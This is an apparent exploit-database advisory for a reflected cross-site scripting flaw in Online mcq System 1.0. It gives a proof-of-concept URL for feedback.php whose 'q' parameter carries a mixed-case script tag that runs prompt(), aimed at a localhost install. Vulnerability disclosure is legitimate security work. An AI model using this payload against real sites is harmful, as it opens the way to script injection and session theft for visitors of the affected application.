Headline
Online mcq System 1.0 Cross Site Scripting
Online mcq System version 1.0 suffers from a cross site scripting vulnerability.
=============================================================================================================================================| # Title : Online mcq System 1.0 XSS vulnerability || # Author : indoushka || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) || # Vendor : https://www.kashipara.com/project/download/project2/user/2023/202304/kashipara.com_onlinemcq-zip.zip |=============================================================================================================================================[+] POC :[+] use Payload : feedback.php?q=Thank%2520you%2520for%2520your%2520valuable%2520feedback'"()%26%25<acx><ScRiPt >prompt(990455)</ScRiPt> [+] http://127.0.0.1/onlinemcq/feedback.php?q=Thank%2520you%2520for%2520your%2520valuable%2520feedback%27%22()%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt(990455)%3C/ScRiPt%3EGreetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================